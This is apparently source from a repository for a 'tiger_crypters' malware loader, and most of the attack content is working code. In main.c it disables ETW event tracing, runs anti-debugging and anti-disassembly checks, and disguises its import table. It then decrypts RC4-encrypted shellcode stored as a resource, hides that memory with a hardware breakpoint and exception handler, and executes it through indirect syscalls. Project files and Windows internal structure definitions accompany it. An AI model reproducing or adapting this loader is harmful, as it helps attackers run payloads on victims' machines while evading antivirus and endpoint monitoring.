230 | !?*.[Cc]ache/ 231 | 232 | # Others 233 | ClientBin/ 234 | ~$* 235 | *~ 236 | *.dbmdl 237 | *.dbproj.schemaview 238 | *.jfm 239 | *.pfx 240 | *.publishsettings 241 | orleans.codegen.cs 242 | 243 | # Including strong name files can present a security risk 244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 245 | #*.snk 246 | 247 | # Since there are multiple workflows, uncomment next line to ignore bower_components 248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 249 | #bower_components/ 250 | 251 | # RIA/Silverlight projects 252 | Generated_Code/ 253 | 254 | # Backup & report files from converting an old project file 255 | # to a newer Visual Studio version. Backup files are not needed, 256 | # because we have git ;-) 257 | _UpgradeReport_Files/ 258 | Backup*/ 259 | UpgradeLog*.XML 260 | UpgradeLog*.htm 261 | ServiceFabricBackup/ 262 | *.rptproj.bak 263 | 264 | # SQL Server files 265 | *.mdf 266 | *.ldf 267 | *.ndf 268 | 269 | # Business Intelligence projects 270 | *.rdl.data 271 | *.bim.layout 272 | *.bim_*.settings 273 | *.rptproj.rsuser 274 | *- [Bb]ackup.rdl 275 | *- [Bb]ackup ([0-9]).rdl 276 | *- [Bb]ackup ([0-9][0-9]).rdl 277 | 278 | # Microsoft Fakes 279 | FakesAssemblies/ 280 | 281 | # GhostDoc plugin setting file 282 | *.GhostDoc.xml 283 | 284 | # Node.js Tools for Visual Studio 285 | .ntvs_analysis.dat 286 | node_modules/ 287 | 288 | # Visual Studio 6 build log 289 | *.plg 290 | 291 | # Visual Studio 6 workspace options file 292 | *.opt 293 | 294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 295 | *.vbw 296 | 297 | # Visual Studio LightSwitch build output 298 | **/*.HTMLClient/GeneratedArtifacts 299 | **/*.DesktopClient/GeneratedArtifacts 300 | **/*.DesktopClient/ModelManifest.xml 301 | **/*.Server/GeneratedArtifacts 302 | **/*.Server/ModelManifest.xml 303 | _Pvt_Extensions 304 | 305 | # Paket dependency manager 306 | .paket/paket.exe 307 | paket-files/ 308 | 309 | # FAKE - F# Make 310 | .fake/ 311 | 312 | # CodeRush personal settings 313 | .cr/personal 314 | 315 | # Python Tools for Visual Studio (PTVS) 316 | __pycache__/ 317 | *.pyc 318 | 319 | # Cake - Uncomment if you are using it 320 | # tools/** 321 | # !tools/packages.config 322 | 323 | # Tabs Studio 324 | *.tss 325 | 326 | # Telerik's JustMock configuration file 327 | *.jmconfig 328 | 329 | # BizTalk build output 330 | *.btp.cs 331 | *.btm.cs 332 | *.odx.cs 333 | *.xsd.cs 334 | 335 | # OpenCover UI analysis results 336 | OpenCover/ 337 | 338 | # Azure Stream Analytics local run output 339 | ASALocalRun/ 340 | 341 | # MSBuild Binary and Structured Log 342 | *.binlog 343 | 344 | # NVidia Nsight GPU debugger configuration file 345 | *.nvuser 346 | 347 | # MFractors (Xamarin productivity tool) working folder 348 | .mfractor/ 349 | 350 | # Local History for Visual Studio 351 | .localhistory/ 352 | 353 | # BeatPulse healthcheck temp database 354 | healthchecksdb 355 | 356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 357 | MigrationBackup/ 358 | 359 | # Ionide (cross platform F# VS Code tools) working folder 360 | .ionide/ 361 | 362 | # Fody - auto-generated XML schema 363 | FodyWeavers.xsd 364 | 365 | payload.bin -------------------------------------------------------------------------------- /tiger/main.c: -------------------------------------------------------------------------------- 1 | #pragma warning (disable : 4090 4715) 2 | #include "structs.h" 3 | #include "debug/debug.h" 4 | 5 | // Custom loader api function 6 | #include "custom_loaderapi.h" 7 | 8 | // Crypt 9 | #include "encryption/rc4.h" 10 | 11 | // Anti-XXXX functions 12 | #include "anti-analysis/anti-debug.h" 13 | #include "anti-analysis/anti-disass.h" 14 | 15 | // Indirect syscalls via tartarus gate 16 | #include "indirect_syscall.h" 17 | 18 | // Mutant creation 19 | #include "mutex/mutex.h" 20 | 21 | // ETW Bypassing 22 | #include "ETW/etw.h" 23 | 24 | // Include all typedefs and string hashes 25 | #include "typedefs.h" 26 | 27 | // Helper functions 28 | #include "helper_functions.h" 29 | 30 | // Exception handler 31 | #include "hooks/exception_handler.h" 32 | 33 | // Hardware Breakpoints 34 | #include "hooks/hwbp.h" 35 | 36 | // Hook functions 37 | #include "hooks/hook_functions.h" 38 | 39 | // IAT camoflage 40 | #include "IAT/iat_camoflage.h" 41 | 42 | // include the resource (shellcode) 43 | #include "resource.h" 44 | 45 | #define ERR -0x1 46 | #define SUCCESS 0x0 47 | 48 | BOOL InitializeNtSyscalls(); 49 | int _TIGER(HANDLE hMutant, PVOID Handler); 50 | 51 | // Global Variable 52 | NTAPI_FUNC _G_NTFUNC = { 0 }; 53 | 54 | // RCX execution 55 | LPVOID RtlCallFunction(LPVOID lpparam) { 56 | (*(LPVOID(WINAPI*)())(lpparam))(); 57 | return 0; 58 | } 59 | 60 | //int APIENTRY WinMain(HINSTANCE hInst, HINSTANCE hInstPrev, PSTR cmdline, int cmdshow){ 61 | int main(void) { 62 | if (DisableETW(ETWEVENTWRITE_HASH) == FALSE || DisableETW(ETWEVENTWRITEFULL_HASH) == FALSE) { 63 | return -1; 64 | } 65 | 66 | #ifdef DEBUG 67 | PRINTA("\n[+] Bypassed ETW Successfully !\n\n"); 68 | #endif 69 | 70 | NTSTATUS STATUS = NULL; 71 | WCHAR MUTANTNAME[] = { '\\','B','a','s','e','N','a','m','e','d','O','b','j','e','c','t','s','\\','S','M','0',':','4','2','1','2',':','T','I','G','1','2','0',':','W','i','l','E','r','r','o','r','_','0','3', 0x0 }; 72 | BOOL debugged = FALSE; 73 | BOOL MutexRes = FALSE; 74 | 75 | // example: -10000000 = 1sec relative to current :) 76 | // Used by NtDelayExecution() 77 | LONGLONG sleepTimer = WAITTIMER; 78 | 79 | // Anti-Disassembly 80 | AntiDisassmConstantCondition(); 81 | AntiDisassmAsmJmpSameTarget(); 82 | AntiDisassmImpossibleDiasassm(); 83 | 84 | HANDLE hMutant = _CreateMutant(MUTANTNAME); 85 | if (hMutant == NULL) { 86 | return -1; 87 | } 88 | 89 | // Increase the number for longer operation 90 | // defined MPL0 in typedef.h 91 | for (int i = 0; i < MLP0; i++) { 92 | camoflage_IAT(); 93 | } 94 | 95 | if (AntiDebugPEBCheck() != FALSE) { 96 | 97 | #ifdef DEBUG 98 | PRINTA("[-] Debugging check (PEB) -> FAILED\n"); 99 | #endif 100 | 101 | debugged = TRUE; 102 | } 103 | 104 | if (NtGlobalFlagCheck() != FALSE) { 105 | 106 | #ifdef DEBUG 107 | PRINTA("[-] Debugging check (NtGlobalFlags) -> FAILED\n"); 108 | #endif 109 | debugged = TRUE; 110 | } 111 | 112 | if (DelayExecution(sleepTimer) == FALSE) { 113 | #ifdef DEBUG 114 | PRINTA("[-] Debugging check (NtDelayExecution) -> FAILED\n"); 115 | #endif 116 | debugged = TRUE; 117 | } 118 | 119 | if (debugged == TRUE) { 120 | #ifdef DEBUG 121 | PRINTA("[-] Debugger attached\n"); 122 | #endif 123 | 124 | return -1; 125 | } 126 | 127 | 128 | #ifdef DEBUG 129 | PRINTA("[+] Debugger checks -> PASS\n"); 130 | #endif 131 | 132 | t_RtlAddVectoredExceptionHandler RtlAddVectoredExceptionHandler = 133 | (t_RtlAddVectoredExceptionHandler)_GetProcAddress(_GetModuleHandle(NTDLL_HASH), RTLADDVECTOREDEXCEPTIONHANDLER_HASH); 134 | 135 | SET_HANDLERINFO((DWORD64)&MessageBoxA, (DWORD64)&hook_MessageBox); 136 | PVOID pEhandler = RtlAddVectoredExceptionHandler(1, &e_handler); 137 | 138 | #ifdef DEBUG 139 | //PRINTA("Vectored Handler result: 0x%p\n", pEhandler); 140 | #endif 141 | 142 | if (pEhandler == NULL) { 143 | return -1; 144 | } 145 | 146 | _TIGER(hMutant, pEhandler); 147 | 148 | return SUCCESS; 149 | } 150 | 151 | // Populate the NTAPI_FUNC->NTSYSAPI structure with information about a syscall 152 | BOOL InitializeNtSyscalls() { 153 | 154 | if (!ObtainSyscall(NTALLOCATEVIRTUALMEMORY_HASH, &_G_NTFUNC.NtAllocateVirtualMemory)) { 155 | #ifdef DEBUG 156 | PRINTA("[!] Failed In Obtaining The Syscall Number Of NtAllocateVirtualMemory \n"); 157 | #endif 158 | return FALSE; 159 | } 160 | #ifdef DEBUG 161 | PRINTA("[+] Syscall Number Of NtAllocateVirtualMemory Is : 0x%0.2X \n\t\t>> Executing 'syscall' instruction Of Address : 0x%p\n", _G_NTFUNC.NtAllocateVirtualMemory.dwSSN, _G_NTFUNC.NtAllocateVirtualMemory.pRandSyscallAddress); 162 | #endif 163 | 164 | if (!ObtainSyscall(NTPROTECTVIRTUALMEMORY_HASH, &_G_NTFUNC.NtProtectVirtualMemory)) { 165 | #ifdef DEBUG 166 | PRINTA("[!] Failed In Obtaining The Syscall Number Of NtProtectVirtualMemory \n"); 167 | #endif 168 | return FALSE; 169 | } 170 | #ifdef DEBUG 171 | PRINTA("[+] Syscall Number Of NtProtectVirtualMemory Is : 0x%0.2X \n\t\t>> Executing 'syscall' instruction Of Address : 0x%p\n", _G_NTFUNC.NtProtectVirtualMemory.dwSSN, _G_NTFUNC.NtProtectVirtualMemory.pRandSyscallAddress); 172 | #endif 173 | if (!ObtainSyscall(NTCREATETHREADEX_HASH, &_G_NTFUNC.NtCreateThreadEx)) { 174 | #ifdef DEBUG 175 | PRINTA("[!] Failed In Obtaining The Syscall Number Of NtCreateThreadEx \n"); 176 | #endif 177 | return FALSE; 178 | } 179 | #ifdef DEBUG 180 | PRINTA("[+] Syscall Number Of NtCreateThreadEx Is : 0x%0.2X \n\t\t>> Executing 'syscall' instruction Of Address : 0x%p\n", _G_NTFUNC.NtCreateThreadEx.dwSSN, _G_NTFUNC.NtCreateThreadEx.pRandSyscallAddress); 181 | #endif 182 | if (!ObtainSyscall(NTWAITFORSINGLEOBJECT_HASH, &_G_NTFUNC.NtWaitForSingleObject)) { 183 | #ifdef DEBUG 184 | PRINTA("[!] Failed In Obtaining The Syscall Number Of NtWaitForSingleObject \n"); 185 | #endif 186 | return FALSE; 187 | } 188 | #ifdef DEBUG 189 | PRINTA("[+] Syscall Number Of NtWaitForSingleObject Is : 0x%0.2X \n\t\t>> Executing 'syscall' instruction Of Address : 0x%p\n", _G_NTFUNC.NtWaitForSingleObject.dwSSN, _G_NTFUNC.NtWaitForSingleObject.pRandSyscallAddress); 190 | #endif 191 | return TRUE; 192 | } 193 | 194 | int _TIGER(HANDLE hMutant, PVOID Handler) { 195 | 196 | t_FindResourceW FindResourceW = (t_FindResourceW)_GetProcAddress(_GetModuleHandle(KERNEL32_HASH), FINDRESOURCEW_HASH); 197 | t_LoadResource LoadResource = (t_LoadResource)_GetProcAddress(_GetModuleHandle(KERNEL32_HASH), LOADRESOURCE_HASH); 198 | t_LockResource LockResource = (t_LockResource)_GetProcAddress(_GetModuleHandle(KERNEL32_HASH), LOCKRESOURCE_HASH); 199 | t_SizeofResource SizeofResource = (t_SizeofResource)_GetProcAddress(_GetModuleHandle(KERNEL32_HASH), SIZEOFRESOURCE_HASH); 200 | t_FreeResource FreeResource = (t_FreeResource)_GetProcAddress(_GetModuleHandle(KERNEL32_HASH), FREERESOURCE_HASH); 201 | t_RtlSecureZeroMemory RtlSecureZeroMemory = 202 | (t_RtlSecureZeroMemory)_GetProcAddress(_GetModuleHandle(KERNEL32_HASH), RTLSECUREZEROMEMORY_HASH); 203 | 204 | t_RtlRemoveVectoredExceptionHandler RtlRemoveVectoredExceptionHandler = 205 | (t_RtlRemoveVectoredExceptionHandler)_GetProcAddress(_GetModuleHandle(NTDLL_HASH), RTLREMOVEVECTOREDEXCEPTIONHANDLER_HASH); 206 | 207 | // Get the shellcode from resource (.rsrc) 208 | HRSRC res = FindResourceW(NULL, MAKEINTRESOURCEW(IDR_SCODE1), RT_RCDATA); 209 | HGLOBAL resHandle = LoadResource(NULL, res); 210 | unsigned char* payload = (unsigned char*)LockResource(resHandle); 211 | SIZE_T sSize = SizeofResource(NULL, res); 212 | 213 | //--------------------------------------- 214 | 215 | NTSTATUS STATUS = NULL; 216 | PVOID pAddress = NULL; 217 | DWORD dwOld = NULL; 218 | HANDLE hProcess = NtCurrentProcess(), // local process 219 | hThread = NULL; 220 | 221 | PRINTA("Resource ADDR: %#p\n", res); 222 | 223 | const char key[] = { 'X','@','f','8','k','d','3','T','D','o','!','r','j','E' }; 224 | SIZE_T sizeKey = sizeof(key); 225 | 226 | // initializing the used syscalls 227 | if (!InitializeNtSyscalls()) { 228 | #ifdef DEBUG 229 | PRINTA("[!] Failed To Initialize The Specified Indirect Syscalls \n"); 230 | #endif 231 | return -1; 232 | } 233 | 234 | // allocating memory 235 | SET_SYSCALL(_G_NTFUNC.NtAllocateVirtualMemory); 236 | if ((STATUS = RunSyscall(hProcess, &pAddress, 0, &sSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)) != 0x00 || pAddress == NULL) { 237 | #ifdef DEBUG 238 | PRINTA("[!] NtAllocateVirtualMemory Failed With Error: 0x%0.8X \n", STATUS); 239 | #endif 240 | return -1; 241 | } 242 | 243 | SET_SCADDRESS(hProcess, pAddress, sSize, dwOld); 244 | 245 | // copying the payload 246 | if (ZwMoveMemory(pAddress, payload, sSize) != NULL) { 247 | #ifdef DEBUG 248 | PRINTA("[+] Memory moved ! (ADDR: 0x%p)\n", pAddress); 249 | #endif 250 | 251 | if ((STATUS = CryptMemory032(pAddress, sSize, key, sizeKey)) != 0x00) { 252 | #ifdef DEBUG 253 | PRINTA("[-] Decryption Failed ! (STATUS 0x%0.8X)\n", STATUS); 254 | #endif 255 | return -1; 256 | } 257 | 258 | #ifdef DEBUG 259 | PRINTA("[+] Memory decrypted successfully !\n"); 260 | #endif 261 | 262 | // Setting HWBP 263 | HWBP(NtCurrentThread(), (DWORD64)&MessageBoxA, TRUE); 264 | 265 | // Call MessageBoxA and protect the shellcode memory block 266 | MessageBoxA(NULL, "Unexpected behaviour!", "Error", 0x00000010L); 267 | 268 | RtlRemoveVectoredExceptionHandler(Handler); 269 | 270 | } 271 | else { 272 | return -1; 273 | } 274 | 275 | // changing memory protection 276 | SET_SYSCALL(_G_NTFUNC.NtProtectVirtualMemory); 277 | if ((STATUS = RunSyscall(hProcess, &pAddress, &sSize, PAGE_EXECUTE_READ, &dwOld)) != 0x00) { 278 | #ifdef DEBUG 279 | PRINTA("[!] NtProtectVirtualMemory Failed With Status : 0x%0.8X\n", STATUS); 280 | #endif 281 | return -1; 282 | } 283 | 284 | 285 | // executing the payload 286 | SET_SYSCALL(_G_NTFUNC.NtCreateThreadEx); 287 | if ((STATUS = RunSyscall(&hThread, THREAD_ALL_ACCESS, NULL, hProcess, RtlCallFunction, pAddress, FALSE, NULL, NULL, NULL, NULL)) != 0x00) { 288 | #ifdef DEBUG 289 | PRINTA("[!] NtCreateThreadEx Failed With Status : 0x%0.8X\n", STATUS); 290 | #endif 291 | return -1; 292 | } 293 | 294 | // waiting for the payload 295 | SET_SYSCALL(_G_NTFUNC.NtWaitForSingleObject); 296 | if ((STATUS = RunSyscall(hThread, FALSE, NULL)) != 0x00) { 297 | #ifdef DEBUG 298 | PRINTA("[!] NtWaitForSingleObject Failed With Error: 0x%0.8X \n", STATUS); 299 | #endif 300 | return -1; 301 | } 302 | 303 | // Free the .rsrc section with the shellcode 304 | RtlSecureZeroMemory(payload, sSize); 305 | FreeResource(res); 306 | 307 | BOOL MutantRes = _DestroyMutant(hMutant); 308 | if (MutantRes != TRUE) { 309 | return -1; 310 | } 311 | } -------------------------------------------------------------------------------- /tiger_crypters/tiger_crypters.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | FinalDLLRelease 10 | Win32 11 | 12 | 13 | FinalDLLRelease 14 | x64 15 | 16 | 17 | Release 18 | Win32 19 | 20 | 21 | Debug 22 | x64 23 | 24 | 25 | Release 26 | x64 27 | 28 | 29 | 30 | 17.0 31 | Win32Proj 32 | {decd3c3d-eeff-4c1d-9cf6-efc0a98714ec} 33 | tigercrypters 34 | 10.0 35 | 36 | 37 | 38 | Application 39 | true 40 | v143 41 | Unicode 42 | 43 | 44 | Application 45 | false 46 | v143 47 | true 48 | Unicode 49 | 50 | 51 | Application 52 | false 53 | v143 54 | true 55 | Unicode 56 | 57 | 58 | Application 59 | true 60 | v143 61 | Unicode 62 | 63 | 64 | Application 65 | false 66 | v143 67 | true 68 | Unicode 69 | 70 | 71 | Application 72 | false 73 | v143 74 | true 75 | Unicode 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | Level3 104 | true 105 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Console 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | true 118 | true 119 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | true 121 | 122 | 123 | Console 124 | true 125 | true 126 | true 127 | 128 | 129 | 130 | 131 | Level3 132 | true 133 | true 134 | true 135 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | true 137 | 138 | 139 | Console 140 | true 141 | true 142 | true 143 | 144 | 145 | 146 | 147 | Level3 148 | true 149 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 150 | true 151 | 152 | 153 | Console 154 | true 155 | 156 | 157 | 158 | 159 | Level3 160 | true 161 | true 162 | true 163 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 164 | true 165 | 166 | 167 | Console 168 | true 169 | true 170 | true 171 | 172 | 173 | 174 | 175 | Level3 176 | true 177 | true 178 | true 179 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 180 | true 181 | 182 | 183 | Console 184 | true 185 | true 186 | true 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | -------------------------------------------------------------------------------- /tiger_crypters/structs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | 5 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 6 | 7 | /*===================================================================== 8 | STRUCTURES 9 | ======================================================================*/ 10 | 11 | typedef struct _LSA_UNICODE_STRING { 12 | USHORT Length; 13 | USHORT MaximumLength; 14 | PWSTR Buffer; 15 | } LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING,* PUNICODE_STR; 16 | 17 | typedef struct _LDR_MODULE { 18 | LIST_ENTRY InLoadOrderModuleList; 19 | LIST_ENTRY InMemoryOrderModuleList; 20 | LIST_ENTRY InInitializationOrderModuleList; 21 | PVOID BaseAddress; 22 | PVOID EntryPoint; 23 | ULONG SizeOfImage; 24 | UNICODE_STRING FullDllName; 25 | UNICODE_STRING BaseDllName; 26 | ULONG Flags; 27 | SHORT LoadCount; 28 | SHORT TlsIndex; 29 | LIST_ENTRY HashTableEntry; 30 | ULONG TimeDateStamp; 31 | } LDR_MODULE, * PLDR_MODULE; 32 | 33 | typedef struct _PEB_LDR_DATA { 34 | ULONG Length; 35 | ULONG Initialized; 36 | PVOID SsHandle; 37 | LIST_ENTRY InLoadOrderModuleList; 38 | LIST_ENTRY InMemoryOrderModuleList; 39 | LIST_ENTRY InInitializationOrderModuleList; 40 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 41 | 42 | typedef struct _RTL_BITMAP 43 | { 44 | ULONG SizeOfBitMap; 45 | ULONG* Buffer; 46 | } RTL_BITMAP, * PRTL_BITMAP; 47 | 48 | typedef struct _RTL_DRIVE_LETTER_CURDIR { 49 | 50 | USHORT Flags; 51 | USHORT Length; 52 | ULONG TimeStamp; 53 | UNICODE_STRING DosPath; 54 | 55 | } RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR; 56 | 57 | typedef struct _RTL_USER_PROCESS_PARAMETERS { 58 | 59 | ULONG MaximumLength; 60 | ULONG Length; 61 | ULONG Flags; 62 | ULONG DebugFlags; 63 | PVOID ConsoleHandle; 64 | ULONG ConsoleFlags; 65 | HANDLE StdInputHandle; 66 | HANDLE StdOutputHandle; 67 | HANDLE StdErrorHandle; 68 | UNICODE_STRING CurrentDirectoryPath; 69 | HANDLE CurrentDirectoryHandle; 70 | UNICODE_STRING DllPath; 71 | UNICODE_STRING ImagePathName; 72 | UNICODE_STRING CommandLine; 73 | PVOID Environment; 74 | ULONG StartingPositionLeft; 75 | ULONG StartingPositionTop; 76 | ULONG Width; 77 | ULONG Height; 78 | ULONG CharWidth; 79 | ULONG CharHeight; 80 | ULONG ConsoleTextAttributes; 81 | ULONG WindowFlags; 82 | ULONG ShowWindowFlags; 83 | UNICODE_STRING WindowTitle; 84 | UNICODE_STRING DesktopName; 85 | UNICODE_STRING ShellInfo; 86 | UNICODE_STRING RuntimeData; 87 | RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20]; 88 | 89 | } RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; 90 | 91 | typedef struct _PEB 92 | { 93 | BOOLEAN InheritedAddressSpace; 94 | BOOLEAN ReadImageFileExecOptions; 95 | BOOLEAN BeingDebugged; 96 | BOOLEAN SpareBool; 97 | HANDLE Mutant; 98 | HMODULE ImageBaseAddress; 99 | PPEB_LDR_DATA LdrData; 100 | RTL_USER_PROCESS_PARAMETERS* ProcessParameters; 101 | PVOID SubSystemData; 102 | HANDLE ProcessHeap; 103 | PRTL_CRITICAL_SECTION FastPebLock; 104 | PVOID FastPebLockRoutine; 105 | PVOID FastPebUnlockRoutine; 106 | ULONG EnvironmentUpdateCount; 107 | PVOID KernelCallbackTable; 108 | PVOID EventLogSection; 109 | PVOID EventLog; 110 | PVOID FreeList; 111 | ULONG TlsExpansionCounter; 112 | PRTL_BITMAP TlsBitmap; 113 | ULONG TlsBitmapBits[2]; 114 | PVOID ReadOnlySharedMemoryBase; 115 | PVOID ReadOnlySharedMemoryHeap; 116 | PVOID* ReadOnlyStaticServerData; 117 | PVOID AnsiCodePageData; 118 | PVOID OemCodePageData; 119 | PVOID UnicodeCaseTableData; 120 | ULONG NumberOfProcessors; 121 | ULONG NtGlobalFlag; 122 | BYTE Spare2[4]; 123 | LARGE_INTEGER CriticalSectionTimeout; 124 | ULONG HeapSegmentReserve; 125 | ULONG HeapSegmentCommit; 126 | ULONG HeapDeCommitTotalFreeThreshold; 127 | ULONG HeapDeCommitFreeBlockThreshold; 128 | ULONG NumberOfHeaps; 129 | ULONG MaximumNumberOfHeaps; 130 | PVOID* ProcessHeaps; 131 | PVOID GdiSharedHandleTable; 132 | PVOID ProcessStarterHelper; 133 | PVOID GdiDCAttributeList; 134 | PVOID LoaderLock; 135 | ULONG OSMajorVersion; 136 | ULONG OSMinorVersion; 137 | ULONG OSBuildNumber; 138 | ULONG OSPlatformId; 139 | ULONG ImageSubSystem; 140 | ULONG ImageSubSystemMajorVersion; 141 | ULONG ImageSubSystemMinorVersion; 142 | ULONG ImageProcessAffinityMask; 143 | ULONG GdiHandleBuffer[34]; 144 | ULONG PostProcessInitRoutine; 145 | PRTL_BITMAP TlsExpansionBitmap; 146 | ULONG TlsExpansionBitmapBits[32]; 147 | ULONG SessionId; 148 | 149 | } PEB, * PPEB; 150 | 151 | typedef struct __CLIENT_ID { 152 | HANDLE UniqueProcess; 153 | HANDLE UniqueThread; 154 | } CLIENT_ID, * PCLIENT_ID; 155 | 156 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT { 157 | ULONG Flags; 158 | PCHAR FrameName; 159 | } TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT; 160 | 161 | typedef struct _TEB_ACTIVE_FRAME { 162 | ULONG Flags; 163 | struct _TEB_ACTIVE_FRAME* Previous; 164 | PTEB_ACTIVE_FRAME_CONTEXT Context; 165 | } TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME; 166 | 167 | typedef struct _GDI_TEB_BATCH { 168 | ULONG Offset; 169 | ULONG HDC; 170 | ULONG Buffer[310]; 171 | } GDI_TEB_BATCH, * PGDI_TEB_BATCH; 172 | 173 | typedef PVOID PACTIVATION_CONTEXT; 174 | 175 | typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME { 176 | struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous; 177 | PACTIVATION_CONTEXT ActivationContext; 178 | ULONG Flags; 179 | } RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME; 180 | 181 | typedef struct _ACTIVATION_CONTEXT_STACK { 182 | PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame; 183 | LIST_ENTRY FrameListCache; 184 | ULONG Flags; 185 | ULONG NextCookieSequenceNumber; 186 | ULONG StackId; 187 | } ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK; 188 | 189 | typedef struct _TEB { 190 | NT_TIB NtTib; 191 | PVOID EnvironmentPointer; 192 | CLIENT_ID ClientId; 193 | PVOID ActiveRpcHandle; 194 | PVOID ThreadLocalStoragePointer; 195 | PPEB ProcessEnvironmentBlock; 196 | ULONG LastErrorValue; 197 | ULONG CountOfOwnedCriticalSections; 198 | PVOID CsrClientThread; 199 | PVOID Win32ThreadInfo; 200 | ULONG User32Reserved[26]; 201 | ULONG UserReserved[5]; 202 | PVOID WOW32Reserved; 203 | LCID CurrentLocale; 204 | ULONG FpSoftwareStatusRegister; 205 | PVOID SystemReserved1[54]; 206 | LONG ExceptionCode; 207 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 208 | PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer; 209 | UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)]; 210 | ULONG TxFsContext; 211 | #elif (NTDDI_VERSION >= NTDDI_WS03) 212 | PACTIVATION_CONTEXT_STACK ActivationContextStackPointer; 213 | UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)]; 214 | #else 215 | ACTIVATION_CONTEXT_STACK ActivationContextStack; 216 | UCHAR SpareBytes1[24]; 217 | #endif 218 | GDI_TEB_BATCH GdiTebBatch; 219 | CLIENT_ID RealClientId; 220 | PVOID GdiCachedProcessHandle; 221 | ULONG GdiClientPID; 222 | ULONG GdiClientTID; 223 | PVOID GdiThreadLocalInfo; 224 | PSIZE_T Win32ClientInfo[62]; 225 | PVOID glDispatchTable[233]; 226 | PSIZE_T glReserved1[29]; 227 | PVOID glReserved2; 228 | PVOID glSectionInfo; 229 | PVOID glSection; 230 | PVOID glTable; 231 | PVOID glCurrentRC; 232 | PVOID glContext; 233 | NTSTATUS LastStatusValue; 234 | UNICODE_STRING StaticUnicodeString; 235 | WCHAR StaticUnicodeBuffer[261]; 236 | PVOID DeallocationStack; 237 | PVOID TlsSlots[64]; 238 | LIST_ENTRY TlsLinks; 239 | PVOID Vdm; 240 | PVOID ReservedForNtRpc; 241 | PVOID DbgSsReserved[2]; 242 | #if (NTDDI_VERSION >= NTDDI_WS03) 243 | ULONG HardErrorMode; 244 | #else 245 | ULONG HardErrorsAreDisabled; 246 | #endif 247 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 248 | PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)]; 249 | GUID ActivityId; 250 | PVOID SubProcessTag; 251 | PVOID EtwLocalData; 252 | PVOID EtwTraceData; 253 | #elif (NTDDI_VERSION >= NTDDI_WS03) 254 | PVOID Instrumentation[14]; 255 | PVOID SubProcessTag; 256 | PVOID EtwLocalData; 257 | #else 258 | PVOID Instrumentation[16]; 259 | #endif 260 | PVOID WinSockData; 261 | ULONG GdiBatchCount; 262 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 263 | BOOLEAN SpareBool0; 264 | BOOLEAN SpareBool1; 265 | BOOLEAN SpareBool2; 266 | #else 267 | BOOLEAN InDbgPrint; 268 | BOOLEAN FreeStackOnTermination; 269 | BOOLEAN HasFiberData; 270 | #endif 271 | UCHAR IdealProcessor; 272 | #if (NTDDI_VERSION >= NTDDI_WS03) 273 | ULONG GuaranteedStackBytes; 274 | #else 275 | ULONG Spare3; 276 | #endif 277 | PVOID ReservedForPerf; 278 | PVOID ReservedForOle; 279 | ULONG WaitingOnLoaderLock; 280 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 281 | PVOID SavedPriorityState; 282 | ULONG_PTR SoftPatchPtr1; 283 | ULONG_PTR ThreadPoolData; 284 | #elif (NTDDI_VERSION >= NTDDI_WS03) 285 | ULONG_PTR SparePointer1; 286 | ULONG_PTR SoftPatchPtr1; 287 | ULONG_PTR SoftPatchPtr2; 288 | #else 289 | Wx86ThreadState Wx86Thread; 290 | #endif 291 | PVOID* TlsExpansionSlots; 292 | #if defined(_WIN64) && !defined(EXPLICIT_32BIT) 293 | PVOID DeallocationBStore; 294 | PVOID BStoreLimit; 295 | #endif 296 | ULONG ImpersonationLocale; 297 | ULONG IsImpersonating; 298 | PVOID NlsCache; 299 | PVOID pShimData; 300 | ULONG HeapVirtualAffinity; 301 | HANDLE CurrentTransactionHandle; 302 | PTEB_ACTIVE_FRAME ActiveFrame; 303 | #if (NTDDI_VERSION >= NTDDI_WS03) 304 | PVOID FlsData; 305 | #endif 306 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 307 | PVOID PreferredLangauges; 308 | PVOID UserPrefLanguages; 309 | PVOID MergedPrefLanguages; 310 | ULONG MuiImpersonation; 311 | union 